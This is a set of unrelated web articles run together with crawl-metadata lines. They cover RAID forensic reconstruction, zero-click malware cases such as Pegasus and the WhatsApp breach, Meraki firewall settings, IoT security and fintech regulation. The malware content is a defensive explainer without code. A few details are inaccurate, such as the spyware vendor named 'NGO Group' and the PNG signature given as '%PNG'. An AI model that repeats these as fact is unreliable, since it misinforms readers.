Why do people use RAID? Domestic users may assemble arrays to create backups or to store their personal archive of photos and documents, along with their home multimedia library (movies, music and so on). Companies use RAID as data storage on the server. This can be a common (shared) document storage, storage for backups, databases, accounting data and the like.
In short, RAID is high-capacity storage for the most valuable data.
So how to deal with it?
There are two ways to make an image of a RAID.
The first one is to get an image on the machine under examination.
The main advantage of this method is that there is no need to understand how the array is arranged. However, this method has many drawbacks and the main one is that doing something on the running examined machine is a big forensic taboo. So, what options are available?
- We may run the server and launch some copying software from a USB flash drive or a Live CD; though the OS may change something during the work, which is obviously bad.
- It is possible to boot up the OS from a CD or a flash drive and launch the software – there is no guarantee that it will work, because, for example, many arrays are software ones (including the widespread NAS), so, to see the RAID, you need to run the appropriate software. Also, if we use this method, we will not be able to access areas of the disks that are not used in RAID.
So, in general, we can’t be sure that the data will remain unchanged.
The second approach is to make a forensic image of each drive separately, and then assemble the array in read-only mode.
This is the only method that ensures the integrity of the data, and also gives us the opportunity to research all areas of the HDD (RAID may very well not use the entire disk from beginning to end, but only some of its internal segments. Thus, there may be unused areas that can store hidden data).
The main disadvantage of this method is the need to assemble the array, namely the need to determine its configuration. So, to do everything correctly, we need to define the configuration.
To assemble the RAID, you have to determine:
- which drives are used: sometimes not all disks are used (there may be spare or excess ones that are used for “system”), sometimes there are not enough disks (one drive might be broken or might have been thrown away, but the array still functions due to redundancy) and so on.
- the order of drives in the array. Sometimes this reflects the order in which the disks were placed inside the computer, but do not bet on this.
- the RAID level and the algorithm (if it does have one)
- the block size used for striping
- the start and finish LBA used in RAID (drives are not necessarily used from 0 to MaxLBA)
- the delay. The repeat is a common feature of Compaq and HP arrays (HP bought Compaq).
Why can the definition of parameters be a problem? The answer is simple – the number of all possible configurations is huge! Taking only the drives in order gives us two dozen variants for four drives, more than a hundred of variants for five drives and thousands of variants for seven drives. And we still have many other parameters that multiply the number of possible configurations.
Of course, there are simple cases, for example:
- software arrays with a well known RAID-metadata format
- a small number of members and simple levels (eg Stripe or Mirror)
All other cases can be really hard for an inexperienced user. Besides, in real life you have to deal with factors that make it extra-complex:
- RAID metadata is missing, corrupted, or incorrect (left over from the “previous” disk life, or is the result of a reinitialization of the array)
- the file system on RAID is corrupted and it is very difficult to use its metadata to define a configuration (the virus or the malefactor could damage FS)
- some members can be unused – hot-spare disks or system-disks.
- another common issue with the members – you may get a bunch of drives from many different arrays. So you will need to understand which disk came from which array first
- the next problem – arrays with exotic configurations, for example, an unusual shift from the beginning of the disk or delay, or whatever else, may be used.
- also, it is often necessary to restore data after a destructive rebuild – the operation of rebuilding an array with incorrect parameters that results in data being damaged (the rebuild itself may be the cause of the investigation)
Assembling RAID during the digital forensic examination is necessary, even though this task can be very, very difficult.
Keys to success
What can help us to cope with all the difficulties? A joint combination of several ideas and approaches:
- the 1st one is a file carving (in Data Extractor it is a “RAW Recovery” mode) with the ability to determine the size of the integer part of the files
- the 2nd one is the statistical processing of the results found by the file carver. Individual files can give the wrong picture, but their set shows a very good result
- the 3rd one – the ability to quickly check the assumption – for this we need a tool that performs all the transformations associated with the RAID translation or in other words we need on-the-fly RAID reconstructions. Building an image for each assumption check takes a lot of time
Next, we will look at all these things in more detail.
File Carving basics
File Carving (“RAW Recovery” mode in PC-3000) is a way to find headers of files using knowledge of file formats without information from the file system. The simplest and the most commonly used approach is to search for the signature of the beginning of the file. For example, PNG images have the signature “%PNG” at the very beginning of the file. For other file types, the signatures are, of course, different.
Knowledge of file formats allows us not only to find the headers but also to estimate the integer part of the file from below.
For example, PNG files consist of a sequence of chunks, each chunk having a signature, size, and checksum, i.e. we can verify it reliably enough. This means that if the file is not damaged or fragmented, we can check it from beginning to end and say that it is “whole” and that its size is N bytes.
If the file is fragmented or a part of it has been rewritten, then we can say that here is the title and the first few pieces are whole. They occupy K bytes. And somewhere after that, there is damage. It can be K+1 byte or K+100 byte – unknown. But the first K bytes are exactly whole.
For different types of files, the ability to check the integer part and the accuracy of this check are very different. Sometimes it is possible to check the whole file, as in this png example. But sometimes we can check only a few hundred bytes from the beginning, for example for BMP files, regardless whether it is whole or damaged.
Ability to find headers and check integer parts for many different file types is a unique feature of PC-3000 RAID Systems that no other tool has.
File carving on a RAID member
Let’s look at a simple RAID 5 Left Synchronous (LS) which consists of three members. If you have ever tried to recover data from RAID, this configuration should be familiar to you:
And now let’s look at one of its members, for example, Member A:
This RAID Table describes the repeating rule of translation. The picture shows just two full repeats and the beginning of the third. Since it is a RAID member, it stores the data blocks and the redundancy block – XOR. Data blocks do not go one after the other like 0, 1, 2, 3, …, they have gaps – 0, 3, 6, etc. because other blocks are stored on other members.
Now let’s talk about how the file carving works on the RAID members.
The member stores the individual blocks of the array, thus the integer part of the file is limited by the size of the block.
- the file may start and end somewhere inside the data block
- if the file is large, it will be interrupted at the end of the block since the other part of the file is stored on another member
Here we see situations the probability of which is extremely small:
The integer part of the file on a RAID member:
- cannot move from block to block
- cannot be inside the XOR block
Such situations exist of course, but their number is much smaller than “normal” ones (as in the previous image).
The conclusion is we can find the integer parts of the files inside the individual data blocks only.
Statistical processing of carved data
The rule of data translation in RAID is periodic. In our case, every two blocks out of three are actually data blocks, and the last one is XOR:
If we just sum up how many integer parts are in each sector of each block, we will see something like this:
- there are a lot of integer parts of files inside the data blocks
- there is nothing inside XOR
- you can see the border between the blocks because the file does not cross the block border
Let’s check the theory in practice. Only PC-3000 RAID Systems have the ability to statistically process carved data and graphically demonstrate the results. In this screenshot, you can see the histogram from the software which was obtained during solving the real case:
The picture is very similar to the previous one. The data blocks and the “empty” XOR block are clearly visible. The red lines show the places where zero and non-zero values are located next to each other. They help to see the potential block borders.
And here are three drives at once:
We can see that the XOR block (the “empty” one) is located in different places on different members, as it should be with RAID 5. The block size equals 128 sectors, and it’s shown on the histogram (just do not forget that the LBAs increase left-right, not top-down. This is a more convenient way to view information on widescreen monitors).
Histogram for different periods
The period size is the number of disks multiplied by the block size and delay. So what if we made a mistake? What will we get? Here are real examples of how the histogram of the same disk looks for different periods:
- in the first case, we made a mistake with the block size – we set the size two times less than needed and received a period that is two times less, and it is not clear that this is RAID 5
- the second picture – all the parameters are correct, it is clear that this is RAID 5
- and the last picture – we chose the wrong number of participants – four instead of three and again we see that the histogram is “broken.”
So, if we build statistics with the wrong period, we will see the wrong histogram.
This can be used as a quick histogram test: calculate the period and look at the histogram. If empty areas are visible (as in the XOR blocks) – the parameters are set correctly; if not, this may be a mistake or the configuration doesn’t have any XOR, RS or HS blocks. In real life cases, the histogram is built instantly or in a few seconds. So, it is really a quick test.
Examples of different configurations
Now let’s look into some patterns for different configurations. All histograms in the pictures are based on real cases.
RAID 5, 8 drives, block size 128 sectors
Here you may see the RAID 5 configuration built on 8 drives with 128-sector block size:
- Why RAID 5? Because it has only one “empty” block – XOR
- Why 8 members? Because the period consists of 8 blocks
- Besides, the 128-sector block size is clearly visible by the distance between the red auxiliary lines
Also, you can see the “noise” here in the XOR block. Some files were found there, it is not impossible. However, there are significantly fewer of them than in the data blocks.
RAID 6 (or 5EE), 6 drives, block size 256 sectors, Start LBA is shifted
And this is the RAID 6 or 5EE which consists of six drives:
- Why RAID 6? – because there are two “empty” blocks. One is XOR, and the other is Reed-Solomon (or a Hot-Spare block, if it is 5EE)
- 6 drives because there are 6 blocks in the period
- the length of one “peak” is 256 sectors, this is the block size
In this picture, you can see that there are two parts of the block at the beginning and at the end:
This happens because RAID does not start from 0 as in previous cases, it has some shift. The size of the blue part at the beginning is 64 sectors (there is a hint above the red line). This means that the RAID begins with some LBA, which should be like this: N * BlockSize + 64, N = 0, 1, 2, … . In our case it was 1088 (= 4*256 + 64) – typical start LBA for some HP and Compaq arrays.
RAID 5, 4 drives, delay 16, block size 128 sectors
Here you may see the RAID 5 with delay value equals 16:
How do we determine this? Here you can see that the rightmost ¼ is an area with service data. There are a lot of red lines – this is the “noise” that creates the small files found in the XOR. In total, we had four drives, so we suggest that this is a RAID 5 which consists of four drives. (A similar histogram can be seen for RAID 6 which consists of eight drives). The remaining areas are filled with data, but it is clearly seen that there are many blocks inside one area. Let’s zoom in on one of the areas.
Now you can see that there are 16 blocks inside one area:
This means that the delay is 16 and the block size is 128 sectors.
RAID 0 (or 10 or 1E), block size 128 sectors
And here is an example of RAID 0:
However, the RAID 10 or 1E, or another level if we didn’t determine the right period, will look exactly the same. If you work with this configuration, you should look for a histogram for RAID-5 or 6 first. Then we will be able to say that it is 0, 10 or 1E. These levels have no XOR, Reed-Solomon or HS blocks, so we don’t see the “empty” blocks. Besides, we cannot say how many disks are in RAID because we see similar patterns for a different number of drives.
JBOD or non-RAID drive
Now see what the histogram for JBOD or just a non-RAID drive looks like. You can see that there are no blocks at all:
One drive is unused and one drive is lost
Unused drives are drives that do not belong to the specific RAID array. This could be spare drives, or drives intended to store the OS data.
On the picture you can see that there are four drives that belong to RAID 5, made from five drives with 512-sector block size. And the last one is a stranger. The histogram of this drive differs from all the other drives. Conclusion: the last drive is unused.
We have only four members out of five, so one member is lost.
The same idea goes for drives from different arrays – their histograms will differ.
As such, we see that each RAID level has a peculiar histogram, which can say a lot about the configuration and can even be called its “fingerprint”.
What can we get from a histogram?
The histogram alone gives us a lot of information about the array:
- Block size
- RAID level
- Members count
- Set of possible start LBAs
- Lost and unused drives
But what about the drive order?
Here is an example of RAID 5 which consists of five members and the histograms for all of them. In your opinion, how many drive orders are possible?
Histograms for all drives allow us to set the XOR diagonal. In total, we have four algorithms used in RAID 5. And for each algorithm, we can specify the exact order using this diagonal. PC-3000 RAID Systems have a lot of approaches for how to find the right option and how to check it. We will not go into detail as this is a topic for a separate article. But, in short, the easiest way is to try all four options.
To do this you need to be able to build the RAID on the fly and view various configurations instead of making an image for each one. PC-3000 RAID Systems have an ability to quickly change RAID parameters and immediately observe the result. So it will take less than a minute to go through four configurations.
The same situation is for RAID 6 and 5EE, but there are a few more options: for each algorithm you need to choose which block – XOR or RS – goes first.
To sum up, the proposed approach of using the statistical processing of file carving results – aka histograms – reduces millions of choices into a few possible ones. In other words, it makes complex RAID data recovery issues simple!
About The Author
Alexander Leonenko is a Software Developer and RAID Data Recovery Instructor at ACE Lab.
ACE Lab is internationally recognized as an innovator in the development of the most cutting-edge solutions for recovering data and evidence from storage devices like HDD, SSD, Flash drives, RAID and others. ACE Lab has set the benchmark for professional data recovery and remains the proven leader in the field for 27 years since its foundation in 1992. Data recovery engineers and digital forensics experts from over 117 countries award their trust to the PC-3000 solutions as the most comprehensive and reliable professional data recovery tools. | <urn:uuid:5a13fc22-59a0-44bf-9a50-8e5206685f05> | CC-MAIN-2022-40 | https://www.forensicfocus.com/articles/making-complex-issues-simple-a-unique-method-to-extract-evidence-from-raid-with-lost-configuration/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00362.warc.gz | en | 0.937649 | 3,979 | 3.015625 | 3 |
What is zero-click malware, and how do zero-click attacks work?
In recent years, zero-click attacks have occasionally made their way into the spotlight. As the name suggests, zero-click attacks require no action from the victim – meaning that even the most advanced users can fall prey to serious cyber hacks and spyware tools.
Zero-click attacks are typically highly targeted and use sophisticated tactics. They can have devastating consequences without the victim even knowing that something is wrong in the background. The terms ‘zero-click attacks’ and ‘zero-click exploits’ are often used interchangeably. They are sometimes also called interaction-less or fully remote attacks.
What is zero-click malware?
Traditionally, spying software relies on convincing the targeted person to click on a compromised link or file to install itself on their phone, tablet, or computer. However, with a zero-click attack, the software can be installed on a device without the victim clicking on any link. As a result, zero-click malware or no-click malware is much more dangerous.
The reduced interaction involved in zero-click attacks means fewer traces of any malicious activity. This – plus the fact that vulnerabilities which cybercriminals can exploit for zero-click attacks are quite rare – make them especially prized by attackers.
Even basic zero-click attacks leave little trace, which means detecting them is extremely difficult. Additionally, the same features which make software more secure can often make zero-click attacks harder to detect. Zero-click hacks have been around for years, and the issue has become more widespread with the booming use of smartphones that store a wealth of personal data. As individuals and organizations become increasingly reliant on mobile devices, the need to stay informed about zero-click vulnerabilities has never been greater.
How does a zero-click attack work?
Typically, remote infection of a target’s mobile device requires some form of social engineering, with the user clicking on a malicious link or installing a malicious app to provide the attacker with an entry point. This is not the case with zero-click attacks, which bypass the need for social engineering entirely.
A zero-click hack exploits flaws in your device, making use of a data verification loophole to work its way into your system. Most software uses data verification processes to keep cyber breaches at bay. However, there are persistent zero-day vulnerabilities that are not yet patched, presenting potentially lucrative targets for cybercriminals. Sophisticated hackers can exploit these zero-day vulnerabilities to execute cyber-attacks, which can be implemented with no action on your part.
Often, zero-click attacks target apps that provide messaging or voice calling because these services are designed to receive and interpret data from untrusted sources. Attackers generally use specially formed data, such as a hidden text message or image file, to inject code that compromises the device.
A hypothetical zero-click attack might work like this:
- Cybercriminals identify a vulnerability in a mail or messaging app.
- They exploit the vulnerability by sending a carefully crafted message to the target.
- The vulnerability allows malicious actors to infect the device remotely via emails that consume extensive memory.
- The hacker's email, message, or call won't necessarily remain on the device.
- As a result of the attack, cybercriminals can read, edit, leak, or delete messages.
The hack can be a series of network packets, authentication requests, text messages, MMS, voicemail, video conferencing sessions, phone calls, or messages sent over Skype, Telegram, WhatsApp, etc. All of these can exploit a vulnerability in the code of an application tasked with processing the data.
The fact that messaging apps allow people to be identified with their phone numbers, which are easily locatable, means that they can be an obvious target for both political entities and commercial hacking operations.
The specifics of each zero-click attack will vary depending on which vulnerability is being exploited. A key trait of zero-click hacks is their ability not to leave behind traces, making them very difficult to detect. This means that is not easy to identify who is using them and for what purpose. However, it is reported that intelligence agencies worldwide use them to intercept messages from and monitor the whereabouts of suspected criminals and terrorists.
Examples of zero-click malware
A zero-click vulnerability can affect various devices, from Apple to Android. High profile examples of zero-click exploits include:
Apple zero-click, forced entry, 2021:
In 2021, a Bahraini human rights activist had their iPhone hacked by powerful spyware sold to nation-states. The hack, uncovered by researchers at Citizen Lab, had defeated security protections put in place by Apple to withstand covert compromises.
Citizen Lab is an internet watchdog based at the University of Toronto. They analyzed the activist’s iPhone 12 Pro and found that it had been hacked via a zero-click attack. The zero-click attack took advantage of a previously unknown security vulnerability in Apple’s iMessage, which was exploited to push Pegasus spyware, developed by the Israeli firm NGO Group, to the activist’s phone.
The hack attracted significant news coverage, mainly because it exploited the latest iPhone software at the time, both iOS 14.4 and later iOS 14.6, which Apple released in May 2021. The hack overcame a security software feature built into all versions of iOS 14, called BlastDoor, which was intended to prevent this kind of device hacks by filtering malicious data sent over iMessage. Because of its ability to overcome BlastDoor, this exploit was dubbed ForcedEntry. In response, Apple upgraded its security defenses with iOS 15.
WhatsApp breach, 2019:
This infamous breach was triggered by a missed call, which exploited a flaw in the source code framework of WhatsApp. A zero-day exploit – i.e., a previously unknown and unpatched cyber vulnerability – allowed the attacker to load spyware in the data exchanged between two devices due to the missed call. Once loaded, the spyware enabled itself as a background resource, deep within the device’s software framework.
Jeff Bezos, 2018:
In 2018, Crown Prince Mohammed bin Salman of Saudi Arabia allegedly sent Amazon CEO Jeff Bezos a WhatsApp message with a video promoting Saudi Arabia’s telecom market. It was reported that there was a piece of code within the video file that enabled the sender to extract information from Bezos’s iPhone over several months. This resulted in the capture of text messages, instant messages, and emails, and possibly even eavesdropped recordings taken with the phone’s microphones.
Project Raven, 2016:
Project Raven refers to the UAE’s offensive cyber operations unit, which comprises Emirati security officials and former US intelligence operators working as contractors. Reportedly, they used a tool known as Karma to take advantage of a flaw in iMessage. Karma used specially crafted text messages to hack into the iPhones of activists, diplomats, and rival foreign leaders to obtain photos, emails, text messages, and location information.
How to protect yourself from zero-click exploits
Because zero-click attacks are based on no interaction from the victim, it follows that there isn’t much you can do to protect yourself. While that is a daunting thought, it’s important to remember that, in general, these attacks tend to be targeted at specific victims for espionage purposes or perhaps monetary gain.
That said, practicing basic cyber hygiene will help to maximize your online safety. Sensible precautions you can take include:
- Keep your operating system, firmware, and apps on all your devices up to date as prompted.
- Only download apps from official stores.
- Delete any apps you no longer use.
- Avoid ‘jailbreaking’ or ‘rooting’ your phone since doing so removes protection provided by Apple and Google.
- Use your device password protection.
- Use strong authentication to access accounts, especially critical networks.
- Use strong passwords – i.e., long and unique passwords.
- Regularly backup systems. Systems can be restored in cases of ransomware, and having a current backup of all data speeds the recovery process.
- Enable pop-up blockers or prevent pop-ups from appearing by adjusting your browser settings. Scammers routinely use pop-ups to spread malware.
Using a comprehensive antivirus will also help keep you safe online. Kaspersky Total Security provides 24/7 protection against hackers, viruses, and malware, plus payment protection and privacy tools which protect you from every angle. Kaspersky Internet Security for Android will protect your Android device also. | <urn:uuid:b6cfc57a-e01f-4730-9cc5-7d309cde5ea3> | CC-MAIN-2022-40 | https://me-en.kaspersky.com/resource-center/definitions/what-is-zero-click-malware | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00362.warc.gz | en | 0.937211 | 1,777 | 2.734375 | 3 |
When configuring a firewall for a network, direction of traffic must be taken into account. Some traffic, like users browsing to the internet, will be initiated outbound. Other traffic, like access to a publicly facing server, initiates with an inbound connection. These situations are handled differently, since you can generally trust your users more then connections from the internet.
For outbound traffic, controlling this is an easy process: create an allow rule using the Layer 3 Firewall. This will affect 1:1 NATs, Port Forwards and standard WAN traffic. More information about the outbound firewall feature is available here. The inbound firewall is controlled a little bit differently.
The inbound firewall will deny any traffic that does not have a session initiated by a client behind the MX. This allows internal client machines to connect with any resources they need, but does not let outside devices initiate connections with inside client machines. The exception to this is if a Port Forward or 1:1 NAT is created. More information on Port Forwarding and 1:1 NAT can be found here.
Both Port Forwards and 1:1 NATs have a section for 'Allowed remote IPs'. This governs which outside addresses are allowed to initiate connections. Addresses specified here will be able to connect through the specified public ports. The 'ANY' keyword can be used to grant access to any address, or multiple address can be entered if they are separated by a comma. By specifying addresses that should be communicating with inside nodes, unsolicited connections will be prevented.
Below is an example of both Port Forwarding and 1-1 NAT rules
Restricting inbound access is an important part of increasing security within a network. By either restricting inbound connections or limiting outbound replies, unwanted traffic can be minimized. | <urn:uuid:966d32bb-1bed-48f2-9812-88122d18e92a> | CC-MAIN-2022-40 | https://documentation.meraki.com/MX/NAT_and_Port_Forwarding/Blocking_Inbound_Traffic_on_MX_Security_Appliances | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00362.warc.gz | en | 0.904126 | 370 | 3.09375 | 3 |
Thank you for Subscribing to CIO Applications Weekly Brief
Top Security Concerns Related to the Internet of Things
Smart houses, self-driving vehicles, smart utility meters, and smart cities use this technology.
Fremont, CA: The Internet of Things connects everything to the Internet, is one of the trendiest technologies in the digital transformation age. Smart houses, self-driving vehicles, smart utility meters, and smart cities use this technology. However, there are many security concerns for the internet of things future (IoT).
While IoT devices enable effective communication between devices, automate processes, save time and money, and provide other benefits, one fear among consumers remains IoT security. There have been certain occurrences that have made it challenging to trust IoT devices.
Several smart TVs and cash machines have been hacked, resulting in a loss of confidence among customers and businesses alike. After that, let's see some of the most pressing security concerns for the Internet of Things' future (IoT).
• Malware and ransomware
Cyberattack variants will be unpredictable due to the fast growth of IoT goods. Cybercriminals have evolved to the point that they may even prevent customers from using their own devices.
• Outdated hardware and software
Because IoT devices are becoming more popular, manufacturers are focused on creating new ones rather than paying adequate attention to security.
The majority of these devices do not receive enough updates, and others do not receive any at all. It implies that these devices are secure when purchased but become vulnerable to assaults after hackers discover faults or security flaws.
When these flaws don't get addressed through regular hardware and software upgrades, the devices remain vulnerable to attack. Frequent updates are necessary for everything that gets linked to the Internet, and not having updates might result in data breaches affecting consumers and manufacturers.
• Use of weak and default credentials
Many IoT firms offer devices and include default credentials, such as an admin account, with them. To attack the device, hackers only need the username and password, and they utilize brute-force tactics to infect the devices once they get the account.
The Mirai botnet assault is carried out due to default credentials used on the devices. Consumers should update the default credentials as soon as they receive the device, although most manufacturers mention doing so in the instruction manuals. If the instruction manuals aren't updated, all devices are vulnerable to assault. | <urn:uuid:a5aae68d-be21-45fc-aa2e-459d7d3765e1> | CC-MAIN-2022-40 | https://www.cioapplications.com/news/top-security-concerns-related-to-the-internet-of-things--nid-8992.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00362.warc.gz | en | 0.924999 | 488 | 2.515625 | 3 |
Last year, like many of us, I binge-watched TV series to beat the lockdown blues. In my favourite and the most popular of them all, The Money Heist, the Professor, the ethical protagonist with unquestionable moral values, justifies his crime of minting money for himself and his team because governments all over the globe do the same to bail out big financial institutions and save the connected economy from crisis. Though the series brings up various moral dilemmas, this underlying premise around which the whole story was woven was left undebated. The series’ popularity suggests, in any country, the public holds the same view.
The toughening regulations and public panic
After the 2008 financial crisis, the public was angry against governments for deeming the large financial institutions non-guilty or too big to be judged guilty, even when their actions clearly caused an economic slowdown and impacted the whole globalized world.
This view affected not just the economy but also the next elections in the countries most affected. To reduce public discontent, they toughened financial regulations that review financial decisions of firms and keep their risks within acceptable limits.
The toughening regulations have two problems. Small companies that focus their resources on innovation cannot spend them on having a regulatory compliance team to help them make decisions that abide by the complex financial laws. Bad financial decisions may cost them heavy reparations. This makes businesses risk-averse, suppresses innovation, and is bad for the economy.
The other problem is, many judge regulatory non-compliance to be fraudulent even when it is only a poor business judgement. This would affect share prices and can threaten the very existence of the firm in question.
The new Social Dilemma
It is not only financial institutions that need regulation. Though technology helped us swim through 2020, the Pandemic year, we are now more aware of the negative impact of BigTech.
Tech gadgets and apps have been stalking us for years. Most believe that corporates in this capitalist world put profits above people, an opinion popularized paradoxically by various social media pages and movies like ‘The Social Dilemma’.
So, we think it is the government’s duty to regulate corporate firms. The recent global outrage against the new security policy of WhatsApp proves the need for better regulation and increasing digital security awareness.
The Problem of Regulations
It is impossible to manually regulate digital technologies.How do governments update their systems to regulate businesses? How do they assess their regulations if they are enough to check fraud but not too tight to suppress economic growth?
How do they regulate financial institutions in the fast-evolving, volatile, and connected business ecosystem, not only to gain public trust but also for the greater common good of the businesses, their stakeholders, and the economy?
The volatile business ecosystem demands frequently changing regulations. How can corporates and their compliance teams abide by the changing laws effectively and calculate essential risks that they may have to take?
RegTech as self-adapting digital solutions for FinTech and Beyond
RegTech was conceptualized as a branch of FinTech, to digitize regulations applicable to financial institutions. Governments apply RegTech digital solutions to monitor financial institutions and gather timely reports of non-compliance and risk assessment. RegTech applications are also used by businesses to monitor themselves, verify legal compliance, and avoid legal tussles. These applications check and assess risks and help them choose profitable options.
Though RegTech is popular as GRC (Governance, risk management, and compliance) digital solutions, it is growing beyond FinTech with wide applications. Some of these solutions are being used to regulate technologies. Many digital products have become essential to us.
During the lockdown, we shopped digitally, paid bills using digital wallets, celebrated events virtually, learnt from many webinars. Most of these changes will stay beyond the pandemic scare and these new habits will force many regulatory changes.
Regulatory bodies are mostly understaffed and underfunded. They are trying hard to make sense of the continuously evolving and complex financial ecosystem and regulatory frameworks. Sophisticated, adaptable, and reliable auto-regulatory frameworks built on novel technologies like AI, Blockchain, BigData can take the load and break the complexity. Machine learning models learn, predict, and evolve to meet FinTech advancements as well as regulatory changes.
Compliable laws should closely follow market realities.
We cannot apply laws made for non-digital markets to digital ones. RegTech solutions algorithmize existing laws and check for relevance. However, it is not easy to transfer principles to algorithms. This brings new problems such as, how to assess intent with an algorithm?
How to determine if a company made a bad financial decision to make profits at the cost of breaking a law or hurting the economy? How to differentiate a bad financial decision from intentional fraud?
It may sound impossible, but we are slowly heading towards such complicated RegTech solutions powered by robotic systems built on AI, ML, BigData, Natural Language Processing, Blockchain and other latest technologies. Sceptics may call technology untrustworthy.
Yes, there will be challenges, and humans will have to manually intervene to resolve issues. Despite the issues that technology might bring us, experts agree that RegTech is the most effective solution to digitize regulations in line with the changes in human communications and transactions in our society.
RegTech for the new digitized society
Digitization is expanding our regulatory frameworks to new needs of the society, new business collaborations in new contexts, and new rules and regulations. Many governments have been trying various RegTech solutions to analyze data produced by big financial institutions to make more efficient and appropriate regulations.
The success of these pilot projects gave many businesses the needed confidence to invest in RegTech innovations and the sector has been attracting huge investments.
RegTech Businesses are expected to grow quite fast in this decade. The industry news of new collaborations between software and compliance regulation firms we hear every now and then proves the point.
A start-up approached coMakeIT for an end-to-end RegTech solution, a customizable, domain-agnostic, cloud-native GRC solution. We put together an agile product team to provide the start-up a full suite of product engineering services ranging from architecture, technology choice, UX design, development, CI/CD/CT, and DevOps.
The detailed roadmap we defined, and the MVP we quickly developed assured them of market validation. This helped the start-up fulfil its ambitious goal without worrying about setting up a technology and engineering team.
These collaborations advance the use of analytical software solutions in regulatory monitoring, compliance, and risk-assessment and broaden RegTech to new domains. Many GRC firms now have dedicated cybersecurity and technology risk assessing teams.
It is interesting to note that this is all happening when more traditional non-software firms are slowly adopting digitalization and are being run as software companies.
It is not easy.
With so much data travelling through our web applications, and so many changes happening in the ecosystem, risk assessment and regulatory compliance are extremely difficult.
RegTech solutions eliminate human errors and assess risk with advanced and perpetually evolving models. They are auto authenticated with reliable systems like Blockchain, the technology underlying digital currencies like BitCoin, and hence safer than non-digital frameworks.
The essential RegTech
RegTech solutions are indispensable to solve changing regulatory problems in a digital ecosystem. They solve from both ends. It provides regulators with sophisticated technical methods that auto-supervise and check financial frauds and encourages companies to assess risks and innovate.
RegTech makes regulations and compliance easy and reliable and thus prevents companies from making bad financial decisions. It saves small start-ups time and huge losses due to reparations for security frauds. It fosters innovation, reduces risk, forges new collaborations while automating various trading compliances.
With new vistas opening in RegTech, the sector is growing fast to meet the needs of our digital society. These new advancements give us the hope that RegTech can shape our new digital connected society into a more just one. | <urn:uuid:1e891b0b-8cf8-42e1-87c4-a6783d7386a3> | CC-MAIN-2022-40 | https://www.comakeit.com/blog/regtech-the-evolving-art-of-regulating-fintech-and-beyond/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00362.warc.gz | en | 0.943952 | 1,651 | 2.546875 | 3 |
Information technology — especially the Internet — can have a positive impact on the U.S. financial system. Used improperly, however, such tools have the potential to wreak havoc on the financial sector and consumers.
TheOffice of the Comptroller of the Currency, a unit of the U.S. Department of the Treasury, has launched an initiative on the future of e-commerce finance in light of technology innovation. While acknowledging the advantages of technology, the agency also is worried about the negative impact on financial markets and how it should direct its regulatory program in the future.
The OCC is seeking input from the IT industry, financial enterprises and the public, and has published a white paper outlining its concerns. The deadline for comments on the white paper is May 31.
The benefits of IT in the financial sector include improved productivity in conducting transactions, consumer convenience and system reliability. Dangers include data entry errors, the vulnerability of consumer records and privacy issues.
The Emergence of Fintechs
What also worries the comptroller’s office is the use of technology in creating new kinds of financial intermediaries that would not exist without the Internet. They are broadly referred to as “fintech companies” and include new services such as online payments providers, commercial online lenders and peer-to-peer lending platforms. The OCC is concerned that some of these new entities may not be adequately funded.
The OCC also is concerned about innovative financial products that could mirror the unconventional mortgage entities associated with the financial meltdown of 2008 and 2009.
“But recalling the lessons of the financial crisis, when some innovative products such as subprime mortgages and financially engineered securitizations were used in ways that had disastrous consequences for individuals, communities and our economy, we want to be sure that the banks and thrifts we supervise innovate in a way that is compatible with safety and soundness and consistent with consumer protection laws and regulations,” said U.S. Comptroller of the Currency Thomas Curry.
“In short, what we are trying to encourage is responsible innovation,” he said at a Harvard University forum in March where he previewed the OCC program.
The OCC charters, regulates and supervises all national banks and federal savings associations as well as federal branches and agencies of foreign banks. Its goal is to ensure that these organizations operate in a safe manner, offer fair access to financial services, treat customers fairly, and observe laws and regulations.
The OCC white paper is titled “Supporting Responsible Innovation in the Federal Banking System: An OCC Perspective.” The agency is concerned about its own ability to become more agile and expeditious in its regulatory processes so as to encourage what it considers proper innovation, it revealed in the document. That effort will include utilizing and improving technological expertise within the agency as well as reaching out to the finance and technology sectors for guidance.
OCC Provides a List of Concerns
Other areas of concern are ensuring that banks, nonbanks and fintech providers adopt appropriate risk management tools to address cybersecurity weaknesses associated with existing services as well as with services or products resulting from innovations in technology.
While mobile technologies and social media could enhance access to financial services in underserved communities, the OCC expressed concerns about the importance of brick-and-mortar banking outlets in such communities.
Importantly, in its traditional role of ensuring stability in the finance sector, the OCC raised the question of how fintechs will address that issue.
“Our job is to help ensure that banks of all sizes are capable of withstanding economic storms so that they can continue to support their communities and their customers,” Curry said.
“I would worry about the staying power of some of the new types of lenders. One of the great virtues of community banks is that they know their customers and they stand behind them in good times and bad. I’m not so sure that customers selected by an algorithm would fare as well in a downturn,” he said.
The OCC’s framework for the innovation initiative consists of several elements, according to a statement provided to the E-Commerce Times by spokesperson Bryan Hubbard. They include the following:
- Be sure we have the capacity to identify and understand new trends and technology, as well as the emerging needs of the consumers of financial products.
- Be sure we’re in a position to quickly evaluate products that require regulatory approval and identify the risks that go with them — as well as the safeguards that will be necessary to manage those risks.
- Be a resource for banks and thrifts looking for guidance on our supervisory expectations as they consider new and innovative products.
Finance Groups Appreciate Effort
Business groups generally endorsed the OCC initiative. The agency’s “focus on responsible innovation lines up with our core belief that banks should be empowered to innovate and that consumers should feel confident they have the same protections when doing business with any financial services provider — bank or a nonbank,” said Rob Nichols, president and CEO of theAmerican Bankers Association.
“Banks are helping consumers by delivering innovative products and pursing new partnerships. The OCC’s efforts are an important piece of a broader discussion on how fintech fits into the current regulatory structure,” he said.
“The payments industry is heavily regulated at the state and federal levels. We urge all regulators to work together to avoid duplication and unnecessary regulatory burdens. The OCC calls for cooperation and coordination of the regulators and we applaud this approach,” said Scott Talbott, senior vice president for government affairs at theElectronic Transactions Association.
“More and more, we see regulators studying the modern electronic payments system. It is wise to take the time to understand how technology is changing payments and benefiting consumers, merchants and the economy. The key is what next step regulators take: measured reaction or overreaction?” he told the E-Commerce Times.
